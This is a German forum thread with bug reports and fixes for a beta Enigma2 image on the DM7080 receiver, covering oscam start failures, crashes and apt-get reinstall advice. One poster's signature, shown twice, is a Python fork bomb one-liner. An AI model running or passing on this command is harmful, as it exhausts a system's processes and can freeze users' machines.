Angepinnt Feedback/Bugs in beta image DM7080 OE2.2

  • Ähm merlinskinthemes sucht im skin verzeichnis nach fonts und added die dynamisch je nach theme das man auswählt unserer ist global in einem anderen verzeichnis.
    Als workaround würde ich den font mal ins skinverzeichnis fonts reinkopieren und mal gui restart machen danach sollte das wieder funktionieren ich guck mal ob ich den font in die skins direkt einbaue.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • gleiche probleme wie Druide

    Hallo ich habe genau das gleiche Problem wie Druide mit oscam das es teilweise nicht startet. Wenn Oscam nicht startet funktioniert aber auch keine andere Cam (cccam, oder auch scam) Über Putty mit - /usr/script/oscam-emu.emu start
    startet Oscam sofort,und dann funktionieren aber auch alle andere cams.
    :( hier ein Fehlerreport wenn oscam nicht startet :
    Dateien
    • error report.rar

      (10,99 kB, 732 mal heruntergeladen, zuletzt: )
  • Ich habe eben meine 7080 upgedatet. Nach dem reboot läuft der weiße Balken fast bis zum Ende, bleibt aber dann stehen. Am TV habe ich nur einen grünen Bildschirm mit Dauerspinner. Ich komme mit telnet und ftp auf die Box. Die Laufwerke -lokal und Netz- sind alle gemountet. Webif kann ich auch aufrufen, jedoch wird bei allen Registerkarten nur loading angezeigt. Es wurde ein crashlog erzeugt, jedoch one Anzeige am TV (wie gesagt nur grüner Bildschirm wie beim crashlog jedoch ohne Text und ohne Neustart).
    Dateien
  • mach mal:

    Quellcode

    1. apt-get remove enigma2-plugin-newnigma2-filebrowser

    Quellcode

    1. apt-get install enigma2-skin-nuke.fhd
    Probleme kann man niemals mit derselben Denkweise lösen.

    ¯\_(ツ)_/¯

    "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
    Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
  • auch du deinstallierst zum testen mal bitte den filebrowser wie oben beschrieben
    Probleme kann man niemals mit derselben Denkweise lösen.

    ¯\_(ツ)_/¯

    "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
    Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
  • wie installiere ich den nuke-fhd? Ich habe ja nur das Verzeichnis-nuke-FHD in /usr/share/enigma2 gelöscht. apt-get meint, es sei noch installiert.

    Quellcode

    1. root@dm7080:~# apt-get -f install enigma2-skin-nuke.fhd
    2. Reading package lists... Done
    3. Building dependency tree
    4. Reading state information... Done
    5. enigma2-skin-nuke.fhd is already the newest version.
    6. 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
    7. root@dm7080:~#
  • Quellcode

    1. apt-get --reinstall install enigma2-skin-nuke.fhd
    Probleme kann man niemals mit derselben Denkweise lösen.

    ¯\_(ツ)_/¯

    "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
    Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
  • Also mal was allgemeines was mir hier gerade auffällt ihr beschreibt hier einen "GS Crash nach heutigem Dist Upgrade" vergesst aber zu erwähnen das es nur beim plugin aufruf ist also kein genereller crash beim starten von enigma2.Ich würde euch bitten beim crashlog mit anzugeben wobei das passiert also was ihr starten wollt oder welchem tastendruck würde die sache erleichtern.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Ich habe upgedatet und beim Neustart ist Enigma2 dann stehengeblieben. Wie ich schon schrieb, der Balken im Boxdisplay steht kurz vor dem Ende und bleibt so stehen. Ich habe keine Möglichkeit irgendein Menü aufzurufen, da am TV nur ein grüner Bildschirm mit Dauerspinner angezeigt wird..